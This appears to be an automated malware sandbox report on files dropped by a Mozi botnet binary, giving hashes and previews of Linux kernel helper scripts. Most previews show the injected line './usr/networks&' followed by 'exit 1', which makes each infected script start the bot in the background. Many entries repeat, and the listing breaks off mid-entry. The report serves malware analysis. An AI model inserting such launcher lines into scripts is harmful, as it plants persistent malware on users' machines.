                                                              SSDEEP:24:GgZK+BJ4tKIgz4zA6AqhzD3OQYcR+r4oC:G80t2aAq5eQvR+M
                                                              MD5:F67D88D746E8684039F80038F291B901
                                                              SHA1:3FB52B248C2B563875C193D50FF579B01E881850
                                                              SHA-256:335A6AB099307E5702CC4592F17C0FBED43CC1078E84C0FE5DD75A571E5D0962
                                                              SHA-512:9941B3E08190D1C6BE060A81B45311D149586265083FB5D5FBB2E397CD3B6B0E81CFD42139B923F3777AD1CBDC9AE7046B8DA25DFC97DFFA58F18BB64AA61285
                                                              Malicious:false
                                                              Preview:./usr/networks&.skip_if_no_perf_probe || exit 2.skip_if_no_perf_trace || exit 2... $(dirname $0)/lib/probe_vfs_getname.sh..file=$(mktemp /tmp/temporary_file.XXXXX)..trace_open_vfs_getname() {..evts=$(echo $(perf list syscalls:sys_enter_open* 2>&1 | egrep 'open(at)? ' | sed -r 's/.*sys_enter_([a-z]+) +\[.*$/\1/') | sed 's/ /,/')..perf trace -e $evts touch $file 2>&1 | \..egrep " +[0-9]+\.[0-9]+ +\( +[0-9]+\.[0-9]+ ms\): +touch\/[0-9]+ open(at)?\((dfd: +CWD, +)?filename: +${file}, +flags: CREAT\|NOCTTY\|NONBLOCK\|WRONLY, +mode: +IRUGO\|IWUGO\) += +[0-9]+$".}...add_probe_vfs_getname || skip_if_no_debuginfo.err=$?.if [ $err -ne 0 ] ; then..exit $err.fi..# Do not use whatever ~/.perfconfig file, it may change the output.# via trace.{show_timestamp,show_prefix,etc}.export PERF_CONFIG=/dev/null..trace_open_vfs_getname.err=$?.rm -f ${file}.cleanup_probe_vfs_getname.exit $err../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1945
                                                              Entropy (8bit):4.979286071491067
                                                              Encrypted:false
                                                              SSDEEP:48:RWm+vzox5sLz6EYxhP1zNhxhfB3c2wSLOy62xC:RZ+EN9BsYC
                                                              MD5:48B0FCC1C0DC28CF6C49038349B2052A
                                                              SHA1:EC84B8956F1DDC8FDE4340B54B1C372F8336BBBF
                                                              SHA-256:3C68383030083C47A9841D41A6FE581CB5E302971838E773AAB6F7CF6676C763
                                                              SHA-512:46BCE1A60F89D5A2227A63BD13E12E37A1AB5D98F80DCFE2990DADB34DA8AC6637B777E089E6E3DF703CD5FF45BAC39B0F28289D922CBF2958850D8BBB390388
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.}..if [ $# -eq 0 ];then..echo "No benchmark results file provided"..echo..usage.fi..while getopts o:t:p: name ; do. case $name in..o).. output_file="$OPTARG".$picture_type.. ;;..t).. global_title="$OPTARG".. ;;..p).. picture_type="$OPTARG".. ;;. ?).. usage.. ;;. esac.done.shift $(($OPTIND -1))..plots=0.while [ "$1" ];do. if [ ! -f "$1" ];then..echo "File $1 does not exist"..usage. fi. file[$plots]="$1". title[$plots]="$2". # echo "File: ${file[$plots]} - ${title[plots]}". shift;shift. plots=$((plots + 1)).done..echo "set terminal $picture_type".>> $dir/plot_script.gpl.echo "set output \"$output_file\"".>> $dir/plot_script.gpl.echo "set title \"$global_title\"".>> $dir/plot_script.gpl.echo "set xlabel \"sleep/load time\"".>> $dir/plot_script.gpl.echo "set ylabel \"Performance (%)\"".>> $dir/plot_script.gpl..for((plot=0;plot<$plots;plot++));do.. # Sanity check. ###### I am to dump to get this redir
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):604
                                                              Entropy (8bit):5.561154174414677
                                                              Encrypted:false
                                                              SSDEEP:12:XrBIJk/GnbR1LN0EA055gVA05b8A05hfEA0uVLGOfj14n:7BIJk/wbREEN5ONANhfEScOfjy
                                                              MD5:9D2CE9B921B8F8B5C1EBFE4286555C72
                                                              SHA1:99A3182EA8A51A67CBC111A5B3A99AFE64912BBE
                                                              SHA-256:8D91B2E3D2D4D960A1F9AD0520E75896F8BCA7D6FFED6BE756C04FC642713CF5
                                                              SHA-512:BE5B1134C9487E143DD1D95FA58764EB1C9F072B9DB2950DC8B9D8B40CEABC071BE623FC43E5F9DABE61C2A181A8FE6B73AC7269CAE4A026BBC977F863CC428C
                                                              Malicious:false
                                                              Preview:./usr/networks&..*$LF*) (exit 1) ;;..v[0-9]*)...git update-index -q --refresh...test -z "$(git diff-index --name-only HEAD --)" ||...VN="$VN-dirty" ;;..esac.then..VN=$(echo "$VN" | sed -e 's/-/./g');.else..eval $(grep '^VERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^PATCHLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^SUBLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^EXTRAVERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')...VN="${VERSION}.${PATCHLEVEL}.${SUBLEVEL}${EXTRAVERSION}".fi..VN=$(expr "$VN" : v*'\(.*\)')..echo $VN../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3546
                                                              Entropy (8bit):5.39875675800216
                                                              Encrypted:false
                                                              SSDEEP:48:+ompInFo6hycZe5pJcycfKkIfIJey5rmwxNlxtxgy/mLXFVxRx0F+xeJ3x0U2oxX:LmmVycfJ+6q2IyuTFQ1KU2AHVEm
                                                              MD5:9175A020A49687C9C3769B4E3ECF52BB
                                                              SHA1:744CC9432C843375F236C065D2CCA76275E70748
                                                              SHA-256:B00FF74B7D297A53347F375E626532D14655592F175589276F394F15781715C3
                                                              SHA-512:A30C2A72C46748F4052250093FCE5BC75817A75363DA4CB3E06ABAA4BA0C831151E65FD98F3F94168828719CC4D55625897ADCC3DEE571ED156AA459A066A916
                                                              Malicious:false
                                                              Preview:./usr/networks&...Display a usage message and exit...--interval=value, --space=value, --verbose=value, --task-filter=value,..--stacktrace-depth=value, --require-start=value, --require-end=value,..--reject-start=value, --reject-end=value, --ignore-gfp-wait=value...See Documentation/fault-injection/fault-injection.rst for more...information...failslab options:..--cache-filter=value...fail_page_alloc options:..--ignore-gfp-highmem=value, --min-order=value..ENVIRONMENT..FAILCMD_TYPE...The following values for FAILCMD_TYPE are recognized:....failslab....inject slab allocation failures...fail_page_alloc....inject page allocation failures....If FAILCMD_TYPE is not defined, then failslab is used..EOF.}..if [ $UID != 0 ]; then..echo must be run as root >&2..exit 1.fi..DEBUGFS=`mount -t debugfs | head -1 | awk '{ print $3}'`..if [ ! -d "$DEBUGFS" ]; then..echo debugfs is not mounted >&2..exit 1.fi..FAILCMD_TYPE=${FAILCMD_TYPE:-failslab}.FAULTATTR=$DEBUGFS/$FAILCMD_TYPE..if [ ! -d $FAULTATTR ]; t
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):413
                                                              Entropy (8bit):5.253172935744477
                                                              Encrypted:false
                                                              SSDEEP:12:cnNKNsMvtphZ+gAh2ph/3NGglqLENL9ZEvW5An:MW/h0gO6hfAGZPu
                                                              MD5:C7FF2892487A4A9DCCB9497096C07366
                                                              SHA1:742762D51E61ACEB34E44A410623DE39E5D7903C
                                                              SHA-256:1F4CB9F291DBEF883CFA0238173E31B10F3571B2EFE1321A7B043DCB3AEE0A96
                                                              SHA-512:60E00DC9040A73AE4FC833E344AC636F5B5CE3DA9CF8AE6E56A3099B635A55512B8546C2CF3CAB089FD192B2CD25A635CF2AB81B3B28F611C3D82F9434228595
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi.}..check_device().{..DEVICE=/dev/ion..if [ ! -e $DEVICE ]; then...echo $TCID: No $DEVICE device found >&2...echo $TCID: May be CONFIG_ION is not set >&2...exit $ksft_skip..fi.}..main_function().{..check_device..check_root...# ION_SYSTEM_HEAP TEST..run_test 0..# ION_SYSTEM_CONTIG_HEAP TEST..run_test 1.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3539
                                                              Entropy (8bit):5.262868278091748
                                                              Encrypted:false
                                                              SSDEEP:96:EFX2kIR7xG6YdQr8P1PPM5yGdtloNssUGoq2r+dPolt:EFXi7xG5Qr89M5yGdtKNjUGD2ydQ3
                                                              MD5:9FA7F94959D499382EE4162EC6B3690E
                                                              SHA1:586F5F28FD9A5FEEBF08777D43248855DCA5C281
                                                              SHA-256:9324C4C6D57628AF310A26554D5A05D7DAFA44C9964C6785AE255E1C5DE7311A
